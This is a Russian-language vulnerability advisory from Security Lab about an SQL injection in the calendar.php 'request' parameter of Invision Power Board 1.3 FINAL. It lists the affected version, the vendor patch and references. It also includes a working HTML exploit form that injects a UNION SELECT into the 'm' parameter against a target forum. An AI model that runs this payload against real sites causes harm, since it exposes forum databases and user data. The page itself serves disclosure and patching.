Security Lab

SQL инъекция в Invision Power Board

Дата публикации:05.01.2004
Дата изменения:17.10.2006
Всего просмотров:21686
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Invision Power Board 1.3 FINAL

Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'.

Пример/Эксплоит:

<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<form action='/index.php?act=calendar' method='post' 
onsubmit="this.m.value='2 )) UNION 
'+this.request.value+'#';this.action=this.url.value+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url' 
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request' 
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a 
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit : 
<a href="http://www.security-corporation.com/advisories-025.html" 
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>

URL производителя: http://www.invisionboard.com

Решение:Установите исправление1.3 Security Patch 02-01-04: http://www.invisionboard.com/download/index.php

Ссылки: [Full-Disclosure] [SCSA-025] Invision Power Board SQL Injection Vulnerability